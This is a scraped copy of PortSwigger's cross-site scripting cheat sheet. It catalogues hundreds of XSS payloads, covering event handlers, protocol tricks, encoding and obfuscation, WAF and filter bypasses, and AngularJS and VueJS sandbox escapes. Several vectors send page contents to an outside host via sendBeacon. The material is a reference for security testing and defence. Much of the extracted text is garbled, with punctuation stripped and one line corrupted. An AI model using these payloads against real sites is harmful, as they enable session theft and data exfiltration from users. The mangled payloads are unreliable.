+ All Categories
Home > Documents > Cross-site scripting (XSS) cheat sheet - PortSwigger€¦ · Cross-site scripting (XSS) cheat sheet...

Cross-site scripting (XSS) cheat sheet - PortSwigger€¦ · Cross-site scripting (XSS) cheat sheet...

Date post: 23-Jul-2020
Category:
Upload: others
View: 33 times
Download: 0 times
Share this document with a friend
21
Cross-site scripting (XSS) cheat sheet This cross-site scripting (XSS) cheat sheet contains many vectors that can help you bypass WAFs and filters. You can select vectors by the event, tag or browser and a proof of concept is included for every vector. This cheat sheet is regularly updated in 2020. Last updated: Fri, 07 Aug 2020 14:49:08 +0000. Table of contents Event handlers Event handlers that do not require user interaction Event: Description: Code: onactivate Fires when the element is activated <xss id=x tabindex=1 onactivate=alert(1)></xss> Compatibility: onafterprint Fires after the page is printed <body onafterprint=alert(1)> Compatibility: onafterscriptexecute Fires after script is executed <xss onafterscriptexecute=alert(1)><script>1</script> Compatibility: onanimationcancel Fires when a CSS animation cancels <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><xss id=x style="position:absolute;" onanimationcancel="alert(1)"></xss> Compatibility: onanimationend Fires when a CSS animation ends <style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss> Compatibility: onanimationiteration Fires when a CSS animation repeats <style>@keyframes slidein {}</style><xss style="animation- duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xss> Compatibility: onanimationstart Fires when a CSS animation starts <style>@keyframes x{}</style><xss style="animation-name:x" onanimationstart="alert(1)"></xss> Compatibility: onbeforeactivate Fires before the element is activated <xss id=x tabindex=1 onbeforeactivate=alert(1)></xss> Compatibility: onbeforedeactivate Fires before the element is deactivated <xss id=x tabindex=1 onbeforedeactivate=alert(1)></xss><input autofocus> Compatibility: onbeforeprint Fires before the page is printed <body onbeforeprint=alert(1)> Compatibility: onbeforescriptexecute Fires before script is executed <xss 
onbeforescriptexecute=alert(1)><script>1</script> Compatibility:
Transcript
Page 1: Cross-site scripting (XSS) cheat sheet - PortSwigger€¦ · Cross-site scripting (XSS) cheat sheet This cross-site scripting (XSS) cheat sheet contains many vectors that can help

Cross-site scripting (XSS) cheat sheetThis cross-site scripting (XSS) cheat sheet contains many vectors that can help you bypass WAFs and filters You can select vectors by the event tag orbrowser and a proof of concept is included for every vector This cheat sheet is regularly updated in 2020 Last updated Fri 07 Aug 2020 144908 +0000

Table of contents

Event handlers

Event handlers that do not require user interaction

Event Description Code

onactivate

Fires when the element is activated ltxss id=x tabindex=1 onactivate=alert(1)gtltxssgtCompatibility

onafterprint

Fires after the page is printed ltbody onafterprint=alert(1)gtCompatibility

onafterscriptexecute

Fires after script is executed ltxss onafterscriptexecute=alert(1)gtltscriptgt1ltscriptgtCompatibility

onanimationcancel

Fires when a CSS animation cancels ltstylegtkeyframes xfrom left0to left 1000pxtarget animation10s ease-in-out 0s 1 xltstylegtltxss id=x style=positionabsolute onanimationcancel=alert(1)gtltxssgt

Compatibility

onanimationend

Fires when a CSS animation ends ltstylegtkeyframes xltstylegtltxss style=animation-namex onanimationend=alert(1)gtltxssgt

Compatibility

onanimationiteration

Fires when a CSS animation repeats ltstylegtkeyframes slidein ltstylegtltxss style=animation-duration1sanimation-nameslideinanimation-iteration-count2 onanimationiteration=alert(1)gtltxssgt

Compatibility

onanimationstart

Fires when a CSS animation starts ltstylegtkeyframes xltstylegtltxss style=animation-namex onanimationstart=alert(1)gtltxssgt

Compatibility

onbeforeactivate

Fires before the element is activated ltxss id=x tabindex=1 onbeforeactivate=alert(1)gtltxssgtCompatibility

onbeforedeactivate

Fires before the element is deactivated ltxss id=x tabindex=1 onbeforedeactivate=alert(1)gtltxssgtltinput autofocusgtCompatibility

onbeforeprint

Fires before the page is printed ltbody onbeforeprint=alert(1)gtCompatibility

onbeforescriptexecute

Fires before script is executed ltxss onbeforescriptexecute=alert(1)gtltscriptgt1ltscriptgtCompatibility

onbeforeunload

Fires after if the url changes ltbody onbeforeunload=navigatorsendBeacon(httpssslportswigger-labsnetdocumentbodyinnerHTML)gt

Compatibility

onbegin

Fires when a svg animation begins ltsvggtltanimate onbegin=alert(1) attributeName=x dur=1sgtCompatibility

onblur

Fires when an element loses focus lta onblur=alert(1) tabindex=1 id=xgtltagtltinput autofocusgtCompatibility

onbounce

Fires when the marquee bounces ltmarquee width=1 loop=1 onbounce=alert(1)gtXSSltmarqueegtCompatibility

oncanplay

Fires if the resource can be played ltaudio oncanplay=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt

Compatibility

oncanplaythrough

Fires when enough data has been loadedto play the resource all the way through

ltvideo oncanplaythrough=alert(1)gtltsource src=validvideomp4 type=videomp4gtltvideogt

Compatibility

oncuechange

Fires when subtitle changes ltvideo controlsgtltsource src=validvideomp4 type=videomp4gtlttrack default oncuechange=alert(1) src=datatextvttWEBVTT FILE 1 000000000 --gt 000005000 ltbgtXSSltbgt gtltvideogt

Compatibility

ondeactivate

Fires when the element is deactivated ltxss id=x tabindex=1 ondeactivate=alert(1)gtltxssgtltinput id=y autofocusgtCompatibility

ondurationchange

Fires when duration changes ltaudio controls ondurationchange=alert(1)gtltsource src=validaudiomp3 type=audiompeggtltaudiogt

Compatibility

onend

Fires when a svg animation ends ltsvggtltanimate onend=alert(1) attributeName=x dur=1sgtCompatibility

onended

Fires when the resource is finishedplaying

ltaudio controls autoplay onended=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt

Compatibility

onerror

Fires when the resource fails to load orcauses an error

ltaudio srconerror=alert(1)gtCompatibility

onfinish

Fires when the marquee finishes ltmarquee width=1 loop=1 onfinish=alert(1)gtXSSltmarqueegtCompatibility

onfocus

Fires when the element has focus lta id=x tabindex=1 onfocus=alert(1)gtltagtCompatibility

onfocusin

Fires when the element has focus lta id=x tabindex=1 onfocusin=alert(1)gtltagtCompatibility

onfocusout

Fires when an element loses focus lta onfocusout=alert(1) tabindex=1 id=xgtltagtltinput autofocusgtCompatibility

onhashchange

Fires if the hash changes ltbody onhashchange=alert(1)gtCompatibility

onload

Fires when the element is loaded ltbody onload=alert(1)gtCompatibility

onloadeddata

Fires when the first frame is loaded ltaudio onloadeddata=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt

Compatibility

onloadedmetadata

Fires when the meta data is loaded ltaudio autoplay onloadedmetadata=alert(1)gt ltsource src=validaudiowav type=audiowavgtltaudiogt

Compatibility

onloadend

Fires when the element finishes loading ltimage src=validimagepng onloadend=alert(1)gtCompatibility

onloadstart

Fires when the element begins to load ltimage src=validimagepng onloadstart=alert(1)gtCompatibility

onmessage

Fires when message event is receivedfrom a postMessage call

ltbody onmessage=alert(1)gtCompatibility

onpageshow

Fires when the page is shown ltbody onpageshow=alert(1)gtCompatibility

onplay

Fires when the resource is played ltaudio autoplay onplay=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt

Compatibility

onplaying

Fires the resource is playing ltaudio autoplay onplaying=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt

Compatibility

onpopstate

Fires when the history changes ltbody onpopstate=alert(1)gtCompatibility

onprogress

Fires when the videoaudio beginsdownloading

ltaudio controls onprogress=alert(1)gtltsource src=validaudiomp3 type=audiompeggtltaudiogt

Compatibility

onreadystatechange

Fires when the ready state changes ltapplet onreadystatechange=alert(1)gtltappletgtCompatibility

onrepeat

Fires when a svg animation repeats ltsvggtltanimate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 gtCompatibility

onresize

Fires when the window is resized ltbody onresize=alert(1)gtCompatibility

onscroll

Fires when the page scrolls ltbody onscroll=alert(1)gtltdiv style=height1000pxgtltdivgtltdiv id=xgtltdivgtCompatibility

onstart

Fires when the marquee starts ltmarquee onstart=alert(1)gtXSSltmarqueegtCompatibility

ontimeupdate

Fires when the timeline is changed ltaudio controls autoplay ontimeupdate=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt

Compatibility

ontoggle

Fires when the details tag is expanded ltdetails ontoggle=alert(1) opengttestltdetailsgtCompatibility

ontransitioncancel

Fires when a CSS transition cancels ltstylegttarget color redltstylegtltxss id=x style=transitioncolor 10s ontransitioncancel=alert(1)gtltxssgt

Compatibility

ontransitionend

Fires when a CSS transition ends ltstylegttarget colorredltstylegtltxss id=x style=transitioncolor 1s ontransitionend=alert(1)gtltxssgt

Compatibility

ontransitionrun

Fires when a CSS transition begins ltstylegttarget transform rotate(180deg)ltstylegtltxss id=x style=transitiontransform 2s ontransitionrun=alert(1)gtltxssgt

Compatibility

ontransitionstart

Fires when a CSS transition starts ltstylegttarget colorredltstylegtltxss id=x style=transitioncolor 1s ontransitionstart=alert(1)gtltxssgt

Compatibility

onunhandledrejection

Fires when a promise isnt handled ltbody onunhandledrejection=alert(1)gtltscriptgtfetch(xyz)ltscriptgtCompatibility

onunload

Fires when the page is unloaded ltbody onunload=navigatorsendBeacon(httpssslportswigger-labsnetdocumentbodyinnerHTML)gt

Compatibility

onwaiting

Fires when while waiting for the data ltvideo autoplay controls onwaiting=alert(1)gtltsource src=validvideomp4 type=videomp4gtltvideogt

Compatibility

onwebkitanimationend

Fires when a CSS animation ends ltstylegtkeyframes xltstylegtltxss style=animation-namex onwebkitanimationend=alert(1)gtltxssgt

Compatibility

onwebkitanimationiteration

Fires when a CSS animation repeats ltstylegtkeyframes slidein ltstylegtltxss style=animation-duration1sanimation-nameslideinanimation-iteration-count2 onwebkitanimationiteration=alert(1)gtltxssgt

Compatibility

onwebkitanimationstart

Fires when a CSS animation starts ltstylegtkeyframes xltstylegtltxss style=animation-namex onwebkitanimationstart=alert(1)gtltxssgt

Compatibility

onwebkittransitionend

Fires when a CSS transition ends ltstylegttarget colorredltstylegtltxss id=x style=transitioncolor 1s onwebkittransitionend=alert(1)gtltxssgt

Compatibility

Event handlers that do require user interaction

Event Description Code

onauxclick

Fires when right clicking or using themiddle button of the mouse

ltinput onauxclick=alert(1)gtCompatibility

onbeforecopy

Requires you copy a piece of text lta onbeforecopy=alert(1) contenteditablegttestltagtCompatibility

onbeforecut

Requires you cut a piece of text lta onbeforecut=alert(1) contenteditablegttestltagtCompatibility

onbeforepaste

Requires you paste a piece of text lta onbeforepaste=alert(1) contenteditablegttestltagtCompatibility

onchange

Requires as change of value ltinput onchange=alert(1) value=xssgtCompatibility

onclick

Requires a click of the element ltxss onclick=alert(1)gttestltxssgtCompatibility

onclose

Fires when a dialog is closed ltdialog open onclose=alert(1)gtltform method=dialoggtltbuttongtXSSltbuttongtltformgt

Compatibility

oncontextmenu

Triggered when right clicking to show thecontext menu

ltxss oncontextmenu=alert(1)gttestltxssgtCompatibility

oncopy

Requires you copy a piece of text ltxss oncopy=alert(1) value=XSS autofocus tabindex=1gttestCompatibility

oncut

Requires you cut a piece of text ltxss oncut=alert(1) value=XSS autofocus tabindex=1gttestCompatibility

ondblclick

Triggered when double clicking theelement

ltxss ondblclick=alert(1) autofocus tabindex=1gttestltxssgtCompatibility

ondrag

Triggered dragging the element ltxss draggable=true ondrag=alert(1)gttestltxssgtCompatibility

ondragend

Triggered dragging is finished on theelement

ltxss draggable=true ondragend=alert(1)gttestltxssgtCompatibility

ondragenter

Requires a mouse drag ltxss draggable=true ondragenter=alert(1)gttestltxssgtCompatibility

ondragleave

Requires a mouse drag ltxss draggable=true ondragleave=alert(1)gttestltxssgtCompatibility

ondragover

Triggered dragging over an element ltdiv draggable=true contenteditablegtdrag meltdivgtltxss ondragover=alert(1) contenteditablegtdrop hereltxssgt

Compatibility

ondragstart

Requires a mouse drag ltxss draggable=true ondragstart=alert(1)gttestltxssgtCompatibility

ondrop

Triggered dropping a draggable element ltdiv draggable=true contenteditablegtdrag meltdivgtltxss ondrop=alert(1) contenteditablegtdrop hereltxssgt

Compatibility

onfullscreenchange

Fires when a video changes full screenstatus

ltvideo onfullscreenchange=alert(1) src=validvideomp4 controlsgtCompatibility

oninput

Requires as change of value ltinput oninput=alert(1) value=xssgtCompatibility

oninvalid

Requires a form submission with anelement that does not satisfy itsconstraints such as a required attribute

ltformgtltinput oninvalid=alert(1) requiredgtltinput type=submitgtCompatibility

onkeydown

Triggered when a key is pressed ltxss onkeydown=alert(1) contenteditablegttestltxssgtCompatibility

onkeypress

Triggered when a key is pressed ltxss onkeypress=alert(1) contenteditablegttestltxssgtCompatibility

onkeyup

Triggered when a key is released ltxss onkeyup=alert(1) contenteditablegttestltxssgtCompatibility

onmousedown

Triggered when the mouse is pressed ltxss onmousedown=alert(1)gttestltxssgtCompatibility

onmouseenter

Triggered when the mouse is hoveredover the element

ltxss onmouseenter=alert(1)gttestltxssgtCompatibility

onmouseleave

Triggered when the mouse is movedaway from the element

ltxss onmouseleave=alert(1)gttestltxssgtCompatibility

onmousemove

Requires mouse movement ltxss onmousemove=alert(1)gttestltxssgtCompatibility

onmouseout

Triggered when the mouse is movedaway from the element

ltxss onmouseout=alert(1)gttestltxssgtCompatibility

onmouseover

Requires a hover over the element ltxss onmouseover=alert(1)gttestltxssgtCompatibility

onmouseup

Triggered when the mouse button isreleased

ltxss onmouseup=alert(1)gttestltxssgtCompatibility

onmousewheel

Fires when the mousewheel scrolls ltxss onmousewheel=alert(1)gtrequires scrollingCompatibility

onmozfullscreenchange

Fires when a video changes full screenstatus

ltvideo onmozfullscreenchange=alert(1) src=validvideomp4 controlsgtCompatibility

onpagehide

Fires when the page is changed ltbody onpagehide=navigatorsendBeacon(httpssslportswigger-labsnetdocumentbodyinnerHTML)gt

Compatibility

onpaste

Requires you paste a piece of text lta onpaste=alert(1) contenteditablegttestltagtCompatibility

onpause

Requires clicking the element to pause ltaudio autoplay controls onpause=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt

Compatibility

onpointerdown

Fires when the mouse down ltxss onpointerdown=alert(1)gtXSSltxssgtCompatibility

onpointerenter

Fires when the mouseenter ltxss onpointerenter=alert(1)gtXSSltxssgtCompatibility

onpointerleave

Fires when the mouseleave ltxss onpointerleave=alert(1)gtXSSltxssgtCompatibility

onpointermove

Fires when the mouse move ltxss onpointermove=alert(1)gtXSSltxssgtCompatibility

onpointerout

Fires when the mouse out ltxss onpointerout=alert(1)gtXSSltxssgtCompatibility

onpointerover

Fires when the mouseover ltxss onpointerover=alert(1)gtXSSltxssgtCompatibility

onpointerrawupdate

Fires when the pointer changes ltxss onpointerrawupdate=alert(1)gtXSSltxssgtCompatibility

onpointerup

Fires when the mouse up ltxss onpointerup=alert(1)gtXSSltxssgtCompatibility

onreset

Requires a click ltform onreset=alert(1)gtltinput type=resetgtCompatibility

onsearch

Fires when a form is submitted and theinput has a type attribute of search

ltformgtltinput type=search onsearch=alert(1) value=Hit return autofocusgtCompatibility

onseeked

Requires clicking the element timeline ltaudio autoplay controls onseeked=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt

Compatibility

onseeking

Requires clicking the element timeline ltaudio autoplay controls onseeking=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt

Compatibility

onselect

Requires you select text ltinput onselect=alert(1) value=XSS autofocusgtCompatibility

onselectionchange

Fires when text selection is changed onthe page

ltbody onselectionchange=alert(1)gtselect some textCompatibility

onselectstart

Fires when beginning a text selection ltbody onselectstart=alert(1)gtselect some textCompatibility

onshow

Fires context menu is shown ltdiv contextmenu=xssgtltpgtRight clickltmenu type=context id=xss onshow=alert(1)gtltmenugtltdivgt

Compatibility

onsubmit

Requires a form submission ltform onsubmit=alert(1)gtltinput type=submitgtCompatibility

ontouchend

Fires when the touch screen only mobiledevice

ltbody ontouchend=alert(1)gt Compatibility

ontouchmove

Fires when the touch screen and moveonly mobile device

ltbody ontouchmove=alert(1)gt Compatibility

ontouchstart

Fires when the touch screen only mobiledevice

ltbody ontouchstart=alert(1)gt Compatibility

onvolumechange

Requires volume adjustment ltaudio autoplay controls onvolumechange=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt

Compatibility

onwheel

Fires when you use the mouse wheel ltbody onwheel=alert(1)gtCompatibility

Restricted characters

No parentheses using exception handling ltscriptgtonerror=alertthrow 1ltscriptgt

No parentheses using exception handling no semicolons

ltscriptgtonerror=alertthrow 1ltscriptgt

No parentheses using exception handling no semicolons using expressions

ltscriptgtthrow onerror=alert1ltscriptgt

No parentheses using exception handling and eval ltscriptgtthrow onerror=eval=alertx281x29ltscriptgt

No parentheses using exception handling and evalon Firefox

ltscriptgtonerror=evalthrowlineNumber1columnNumber1fileName1messagealertx281x29ltscriptgt

No parentheses using ES6 hasInstance andinstanceof with eval

ltscriptgtalertx281x29instanceof[SymbolhasInstance]evalltscriptgt

No parentheses using ES6 hasInstance andinstanceof with eval without

ltscriptgtalertx281x29instanceof[Symbol[hasInstance]]evalltscriptgt

No parentheses using location redirect ltscriptgtlocation=javascriptalertx281x29ltscriptgt

No parentheses using location redirect no strings ltscriptgtlocation=nameltscriptgt

No parentheses using template strings ltscriptgtalert`1`ltscriptgt

No parentheses using template strings and locationhash

ltscriptgtnew Function`X$documentlocationhashsubstr`1``ltscriptgt

No parentheses or spaces using template stringsand location hash

ltscriptgtFunction`X$documentlocationhashsubstr`1````ltscriptgt

Frameworks

Bootstrap onanimationstart event ltxss class=progress-bar-animated onanimationstart=alert(1)gt

Bootstrap ontransitionend event ltxss class=carousel slide data-ride=carousel data-interval=100 ontransitionend=alert(1)gtltxss class=carousel-innergtltxss class=carousel-item activegtltxssgtltxss class=carousel-itemgtltxssgtltxssgtltxssgt

Protocols

Iframe src attribute JavaScript protocol ltiframe src=javascriptalert(1)gt

Object data attribute with JavaScript protocol ltobject data=javascriptalert(1)gt

Embed src attribute with JavaScript protocol ltembed src=javascriptalert(1)gt

A standard JavaScript protocol lta href=javascriptalert(1)gtXSSltagt

The protocol is not case sensitive lta href=JaVaScriptalert(1)gtXSSltagt

Characters x01-x20 are allowed before the protocol lta href= javascriptalert(1)gtXSSltagt

Characters x09x0ax0d are allowed inside theprotocol

lta href=javas criptalert(1)gtXSSltagt

Characters x09x0ax0d are allowed after protocolname before the colon

lta href=javascript alert(1)gtXSSltagt

Xlink namespace inside SVG with JavaScriptprotocol

ltsvggtlta xlinkhref=javascriptalert(1)gtlttext x=20 y=20gtXSSlttextgtltagt

SVG animate tag using values ltsvggtltanimate xlinkhref=xss attributeName=href values=javascriptalert(1) gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt

SVG animate tag using to ltsvggtltanimate xlinkhref=xss attributeName=href from=javascriptalert(1) to=1 gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt

to 1 a id xss text x 20 y 20 XSS text a

SVG set tag ltsvggtltset xlinkhref=xss attributeName=href from= to=javascriptalert(1) gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt

Data protocol inside script src ltscript src=datatextjavascriptalert(1)gtltscriptgt

SVG script href attribute without closing script tag ltsvggtltscript href=datatextjavascriptalert(1) gt

SVG use element ChromeFirefox ltsvggtltuse href=dataimagesvg+xmlltsvg id=x xmlns=httpwwww3org2000svg xmlnsxlink=httpwwww3org1999xlink width=100 height=100gtlta xlinkhref=javascriptalert(1)gtltrect x=0 y=0 width=100 height=100 gtltagtltsvggtxgtltusegtltsvggt

Import statement with data URL ltscriptgtimport(datatextjavascriptalert(1))ltscriptgt

Base tag with JavaScript protocol rewriting relativeURLS

ltbase href=javascripta-alert(1)gtlta href=lolsafarihtmlgttestltagt

MathML makes any tag clickable ltmathgtltx href=javascriptalert(1)gtblah

Button and formaction ltformgtltbutton formaction=javascriptalert(1)gtXSS

Input and formaction ltformgtltinput type=submit formaction=javascriptalert(1) value=XSSgt

Form and action ltform action=javascriptalert(1)gtltinput type=submit value=XSSgt

Use element with an external URL ltsvggtltuse href=subdomain1portswigger-labsnetuse_elementuploadphpx gtltsvggt

Animate tag with keytimes and multiple values ltsvggtltanimate xlinkhref=xss attributeName=href dur=5s repeatCount=indefinite keytimes=001 values=httpsportswiggernetampsemijavascriptalert(1)ampsemi0 gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt

Other useful attributes

Using srcdoc attribute ltiframe srcdoc=ltimg src=1 onerror=alert(1)gtgtltiframegt

Using srcdoc with entities ltiframe srcdoc=ampltimg src=1 onerror=alert(1)ampgtgtltiframegt

Click a submit element from anywhere on the pageeven outside the form

ltform action=javascriptalert(1)gtltinput type=submit id=xgtltformgtltlabel for=xgtXSSltlabelgt

Hidden inputs Access key attributes can enableXSS on normally unexploitable elements

ltinput type=hidden accesskey=X onclick=alert(1)gt (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)

Link elements Access key attributes can enableXSS on normally unexploitable elements

ltlink rel=canonical accesskey=X onclick=alert(1) gt (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)

Download attribute can save a copy of the currentwebpage

lta href= download=filenamehtmlgtTestltagt

Disable referrer using referrerpolicy ltimg referrerpolicy=no-referrer src=portswigger-labsnetgt

Set windowname via parameter on the windowopenfunction

lta href= onclick=windowopen(httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)alert(1))gtXSSltagt

Set windowname via name attribute in a ltiframegt ltiframe name=alert(1) src=httpsportswigger-labsnetxssxssphp

Set do a e a a e att bute a a e

tagcontext=js_string_singleampx=27eval(name)gtltiframegt

Set windowname via target attribute in a ltbasegt tag ltbase target=alert(1)gtlta href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in base tagltagt

Set windowname via target attribute in a ltagt tag lta target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in a tagltagt

Set windowname via usemap attribute in a ltimggttag

ltimg src=validimagepng width=10 height=10 usemap=xssgtltmap name=xssgtltarea shape=rect coords=0082126 target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtltmapgt

Set windowname via target attribute in a ltformgt tag ltform action=httpsubdomain1portswigger-labsnetxssxssphp target=alert(1)gtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit value=XSS via target in a formgtltformgt

Set windowname via formtarget attribute in altinputgt tag type submit

ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type submitgtltformgt

Set windowname via formtarget attribute in altinputgt tag type image

ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput name=1 type=image src=validimagepng formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type imagegtltformgt

Special tags

Redirect to a different domain ltmeta http-equiv=refresh content=0 url=portswigger-labsnetgt

Meta charset attribute UTF-7 ltmeta charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-

Meta charset UTF-7 ltmeta http-equiv=Content-Type content=texthtml charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-

UTF-7 BOM characters (Has to be at the start of thedocument) 1

+v8 +ADw-script+AD4-alert(1)+ADw-script+AD4-

UTF-7 BOM characters (Has to be at the start of thedocument) 2

+v9 +ADw-script+AD4-alert(1)+ADw-script+AD4-

UTF-7 BOM characters (Has to be at the start of thedocument) 3

+v+ +ADw-script+AD4-alert(1)+ADw-script+AD4-

UTF-7 BOM characters (Has to be at the start of thedocument) 4

+v +ADw-script+AD4-alert(1)+ADw-script+AD4-

Upgrade insecure requests ltmeta http-equiv=Content-Security-Policy content=upgrade-insecure-requestsgt

Disable JavaScript via iframe sandbox ltiframe sandbox src=portswigger-labsnetgtltiframegt

Disable referer ltmeta name=referrer content=no-referrergt

Encoding

Overlong UTF-8 C0BCscriptgtalert(1)ltscriptgt E080BCscriptgtalert(1)ltscriptgt F08080BCscriptgtalert(1)ltscriptgt F8808080BCscriptgtalert(1)ltscriptgt FC80808080BCscriptgtalert(1)ltscriptgt

Unicode escapes ltscriptgtu0061lert(1)ltscriptgt

Unicode escapes ES6 style ltscriptgtu61lert(1)ltscriptgt

Unicode escapes ES6 style zero padded ltscriptgtu0000000061lert(1)ltscriptgt

Hex encoding JavaScript escapes ltscriptgteval(x61lert(1))ltscriptgt

Octal encoding ltscriptgteval(141lert(1))ltscriptgt ltscriptgteval(alert(061))ltscriptgt ltscriptgteval(alert(61))ltscriptgt

Decimal encoding with optional semi-colon lta href=amp106avascriptalert(1)gtXSSltagtlta href=amp106avascriptalert(1)gtXSSltagt

SVG script with HTML encoding ltsvggtltscriptgtamp97lert(1)ltscriptgtltsvggt ltsvggtltscriptgtampx61lert(1)ltscriptgtltsvggt ltsvggtltscriptgtalertampNewLine(1)ltscriptgtltsvggt ltsvggtltscriptgtx=ampquotalert(1)ltscriptgtltsvggt

Decimal encoding with padded zeros lta href=amp0000106avascriptalert(1)gtXSSltagt

Hex encoding entities lta href=ampx6aavascriptalert(1)gtXSSltagt

Hex encoding without semi-colon provided nextcharacter is not a-f0-9

lta href=jampx61vascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt

Hex encoding with padded zeros lta href=ampx0000006aavascriptalert(1)gtXSSltagt

Hex encoding is not case sensitive lta href=ampX6Aavascriptalert(1)gtXSSltagt

HTML entities lta href=javascriptampcolonalert(1)gtXSSltagt lta href=javaampTabscriptalert(1)gtXSSltagt lta href=javaampNewLinescriptalert(1)gtXSSltagt lta href=javascriptampcolonalertamplpar1amprpargtXSSltagt

URL encoding lta href=javascriptx=27-alert(1)-27gtXSSltagt

HTML entities and URL encoding lta href=javascriptx=amppercnt27-alert(1)-27gtXSSltagt

Obfuscation

Data protocol inside script src with base64 ltscript src=datatextjavascriptbase64YWxlcnQoMSk=gtltscriptgt

Data protocol inside script src with base64 andHTML entities

ltscript src=datatextjavascriptbase64ampx59ampx57ampx78ampx6campx63ampx6eampx51ampx6fampx4dampx53ampx6bampx3dgtltscriptgt

Data protocol inside script src with base64 and URLencoding

ltscript src=datatextjavascriptbase645957786c636e516f4d536b3dgtltscriptgt

Iframe srcdoc HTML encoded ltiframe srcdoc=ampltscriptampgtalertamplpar1amprparampltampsolscriptampgtgtltiframegt

Iframe JavaScript URL with HTML and URL encoding ltiframe src=javascriptampx25ampx33ampx43ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45ampx61ampx6campx65ampx72ampx74ampx28ampx31ampx29ampx25ampx33ampx43ampx25ampx32ampx46ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45gtltiframegt

SVG script with unicode escapes and HTMLencoding

ltsvggtltscriptgtampx5campx75ampx30ampx30ampx36ampx31ampx5campx75ampx30ampx30ampx36ampx63ampx5campx75ampx30ampx30ampx36ampx35ampx5campx75ampx30ampx30ampx37ampx32ampx5campx75ampx30ampx30ampx37ampx34(1)ltscriptgtltsvggt

Client-side template injection

VueJS reflected

Version Author Length Vector

All versions Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()

All versions Mario Heiderich (Cure53) ampSebastian Lekies (Google)Eduardo Vela Nava (Google)Krzysztof Kotowicz (Google)

62 ltdiv v-html=constructorconstructor(alert(1))()gtaltdivgt

All versions Gareth Heyes (PortSwigger) 39 ltx v-html=_cconstructor(alert(1))()gt

All versions Peter af Geijerstam (SwedishShellcode Factory)

37 ltx v-if=_cconstructor(alert(1))()gt

AngularJS sandbox escapes reflected

Version Author Length Vector

101 - 115 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()

101 - 115(shorter)

Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)

33 $onconstructor(alert(1))()

1.2.0 - 1.2.1 | Jan Horn (Google) | 122 | {{a="constructor";b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,"alert(1)")()}}
1.2.2 - 1.2.5 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)
1.2.6 - 1.2.18 | Jan Horn (Google) | 106 | {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 124 | {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
1.2.24 - 1.2.29 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)
1.2.27 - 1.2.29, 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)
1.3.0 | Gábor Molnár (Google) | 272 | {{!ready && (ready = true) && ( !call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString( 'F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);' )))}}
1.3.3 - 1.3.18 | Gareth Heyes (PortSwigger) | 128 | {{{}[{'toString':[].join,'length':1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)//');}}
1.3.19 | Gareth Heyes (PortSwigger) | 102 | {{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)//');}}
1.3.20 | Gareth Heyes (PortSwigger) | 65 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1.4.0 - 1.4.9 | Gareth Heyes (PortSwigger) | 74 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
1.5.0 - 1.5.8 | Ian Hickey & Gareth Heyes (PortSwigger) | 79 | {{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}
